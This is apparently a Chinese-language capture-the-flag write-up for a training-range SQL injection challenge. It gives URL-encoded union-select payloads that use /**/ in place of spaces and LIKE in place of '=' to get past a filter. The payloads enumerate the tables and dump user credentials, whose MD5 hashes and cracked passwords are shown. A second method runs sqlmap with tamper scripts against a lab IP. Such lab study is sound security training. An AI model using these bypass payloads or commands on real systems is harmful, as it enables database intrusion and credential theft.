SQL过滤字符后手工注入漏洞测试(第1题)
按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面
保持正常,有可能我们输入的字符被过滤
过滤的"="号可以利用like代替,空格用==/**/==代替
判断字段数
/**/order/**/by/**/4
介绍一个在线的url编码解码网站
http://web.chacuo.net/charseturlencode
由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%34
http://219.153.49.228:48746/new_list.php?id=1%2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%34
页面正常,说明字段数是4
判断回显点
首先写出原始SQL语句,联合查询前面要报错才能显示后面的查询语句
-1/**/union/**/select/**/1,2,3,4
在进行url编码得 %2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%32%2c%33%2c%34
2和3成功回显,接下来利用这两个回显点进行数据库的查询
查询数据库
原始SQL语句
-1/**/union/**/select/**/1,database(),user(),4
编码后得==%2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%64%61%74%61%62%61%73%65%28%29%2c%75%73%65%72%28%29%2c%34==
页面成功回显出数据库mozhe_discuz_stormgroup和用户名root@localhost
查询数据库的表
原始SQL语句
-1/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()
编码后得==%2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%2f%2a%2a%2f%77%68%65%72%65%2f%2a%2a%2f%74%61%62%6c%65%5f%73%63%68%65%6d%61%2f%2a%2a%2f%6c%69%6b%65%2f%2a%2a%2f%64%61%74%61%62%61%73%65%28%29%0a==
页面成功回显出两个表notice,stormgroup_member
查询表的字段
原始SQL语句
-1/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/and/**/table_name/**/like'stormgroup_member'
编码后得==%2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%2f%2a%2a%2f%77%68%65%72%65%2f%2a%2a%2f%74%61%62%6c%65%5f%73%63%68%65%6d%61%2f%2a%2a%2f%6c%69%6b%65%2f%2a%2a%2f%64%61%74%61%62%61%73%65%28%29%2f%2a%2a%2f%61%6e%64%2f%2a%2a%2f%74%61%62%6c%65%5f%6e%61%6d%65%2f%2a%2a%2f%6c%69%6b%65%27%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%27==
页面成功回显四个字段id,name,password,status
查询字段的值
原始的SQL语句
-1/**/union/**/select/**/1,group_concat(id,name,password,status),3,4/**/from/**/stormgroup_member
编码后得==%2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%69%64%2c%6e%61%6d%65%2c%70%61%73%73%77%6f%72%64%2c%73%74%61%74%75%73%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72==
页面成功回显出内容
mozhe356f589a7df439f6f744ff19bb8092c0 解密 dsan13
mozhea6babd9eb561e9ffd6f5aad28851daa7 解密 nothere
adminf39b2034e52acfb7fc1c51d227d03d10 解密 111150
方法二直接利用Sqlmap进行自动探测
这里我们需要调用sqlmap的脚本文件
由于此靶场过滤了空格,=号以及将url进行编码所以我们需要调用三个脚本
charencode.py 作用:对给定的payload全部字符使用url编码(将url进行编码,不处理已经编码的字符)
space2comment.py 作用:将空格替换为/**/
equaltolike.py 作用:将=替换为LIKE
其他常用的脚本可见:
https://www.cnblogs.com/mark0/p/12349551.html
接下来利用Sqlmap进行探测
获取数据库
sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch --tamper charencode,space2comment,equaltolike --dbs
获取表
sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch --tamper charencode,space2comment,equaltolike -D mozhe_discuz_stormgroup --tables
获取字段
sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch --tamper charencode,space2comment,equaltolike -D mozhe_discuz_stormgroup -T stormgroup_member --columns
获取字段内容
sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch --tamper charencode,space2comment,equaltolike -D mozhe_discuz_stormgroup -T stormgroup_member -C id,name,password,status --dump
最后MD5解密后登陆后台即可成功获取key